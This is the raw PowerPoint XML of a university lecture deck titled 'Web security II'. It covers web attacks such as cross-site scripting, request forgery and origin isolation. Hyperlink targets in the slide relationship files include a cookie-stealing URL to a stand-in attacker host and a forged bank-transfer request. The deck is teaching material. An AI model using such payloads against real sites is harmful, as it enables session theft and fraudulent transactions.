                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="901">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{02BF48FE-CA27-DB43-AED5-2F6C1DB4DFBA}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EACDD5-AB06-C249-B66F-C59D01BB7579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="139700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E058EAAE-FD40-F44D-9AC6-05275BA27F8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94"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228600" indent="228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="457200" indent="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="685800" indent="685800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="914400" indent="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1143686">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="1372423">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1601160">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1829897">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1pPr marL="0">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="228737">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="457474">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="686211">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="914949">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1143686">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="1372423">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1601160">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1829897">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s.umd.edu/" TargetMode="External"/><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hyperlink" Target="https://cs155.stanford.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10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1.jpeg"/><Relationship Id="rId7"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10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1.jpeg"/><Relationship Id="rId7"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1.jpeg"/><Relationship Id="rId7"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1.jpeg"/><Relationship Id="rId7"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 Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide111.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1.jpeg"/><Relationship Id="rId7"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hyperlink" Target="http://bad.com/steal?c=document.cookie" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bank.com/transfer?amt=9999&amp;amp;to=attacker" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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victim.com/search.php?term=sock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victim.com/search.php?term=sock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bad.com/steal?c" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://victim.com/search.php?term"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bad.com/steal?c" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://victim.com/search.php?term"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bad.com/steal?c" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://victim.com/search.php?term"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owasp.org/www-community/xss-filter-evasion-cheatsheet"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www.jantoo.com/cartoon/08336711"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jpeg"/><Relationship Id="rId7"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QWw7Wd2gUJ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images-mediawiki-sites.thefullwiki.org/09/9/8/1/0429334029464255.jpg"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northshorekid.com/event/meet-mouse-if-you-give-mouse-cookie"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packetstormsecurity.com/files/119773/twitter-cookie.tx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bank.com/transfer.cgi?amt=9999&amp;amp;to=attacke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3.jpe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3.jpe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hyperlink" Target="http://habibbank.com/" TargetMode="External"/><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3.jpe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jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://habibbank.com/" TargetMode="External"/><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3.jpe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6.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://habibbank.com/" TargetMode="Externa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3.jpe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46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://habibbank.com/" TargetMode="Externa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3.jpe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46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId9"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attacker.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bank.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evil.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image" Target="../media/image60.jpe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7.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/index.html" TargetMode="External"/><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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E55D26-B56C-524D-ADDB-222EE0D476D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="609600"/>
            <a:ext cx="6096000" cy="4572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7411" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D38834C0-5AFC-AA41-85E0-C5A1983C54C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1193800" y="5403850"/>
            <a:ext cx="76771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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web security II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383C20A3-CB66-B549-A87E-492E4AB81BEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="6705600"/>
            <a:ext cx="876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9" tIns="45637" rIns="91279" bIns="45637">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GB" altLang="en-US" sz="1400"/>
              <a:t>With material from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400"/>
              <a:t>Dave Levin, Mike Hicks, Lujo Bauer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Department of Computer Science</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400"/>
              <a:t> at the University of Maryland </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cs.umd.edu/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400"/>
              <a:t>Salford University , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CS155 Computer and Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-GB" altLang="en-US"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2F33DEE-3E69-EC4A-B3ED-D66787B5D6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="877928" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-100" dirty="0"/>
              <a:t>Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Online</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="85" dirty="0"/>
              <a:t>ordering</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2869C4B-E927-8D47-9773-D977B34E6AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2284413" y="3157538"/>
            <a:ext cx="5327650" cy="1855787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="982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2676" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="34925">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ts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(pay == yes &amp;&amp; price != NULL)</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bill_creditcard(price);  deliver_socks();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a: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else</a:t>
            </a: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display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F9A731-278D-254F-ABC9-65CD7332F3C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="1968500"/>
            <a:ext cx="6370638" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>corresponding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>backend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>processing</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CAAC42-5F15-4E45-AEDC-B6ADD5DAE2C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="6019800"/>
            <a:ext cx="5937250" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Anyone see </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" b="1" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>here?</a:t>
            </a:r>
            <a:endParaRPr sz="34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5A0346-0353-4942-BF8B-F0CB8DD335AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1492250" y="1244600"/>
            <a:ext cx="7070725" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-525" dirty="0"/>
              <a:t>What’s </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-443" dirty="0"/>
              <a:t>Isolated?</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-843" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-463" dirty="0"/>
              <a:t>(Objects)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8DCC42E-9126-814E-A7DE-14983004C0A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417513" y="2868613"/>
            <a:ext cx="6789737" cy="2974975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="6672" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1976" spc="-18" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="13" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>origin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-13" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>has </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="18" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>client </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>side </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resources </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="28" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-38" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="-33" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1976" spc="33" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>protected</a:t>
            </a:r>
            <a:endParaRPr sz="1976" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2126" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6354">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1976" b="1" spc="-18" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Examples:</a:t>
            </a:r>
            <a:endParaRPr sz="1976" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="529908" indent="-262095">
              <a:spcBef>
                <a:spcPts val="845"/>
              </a:spcBef>
              <a:buSzPct val="125316"/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="529908" algn="l"/>
                <a:tab pos="530225" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
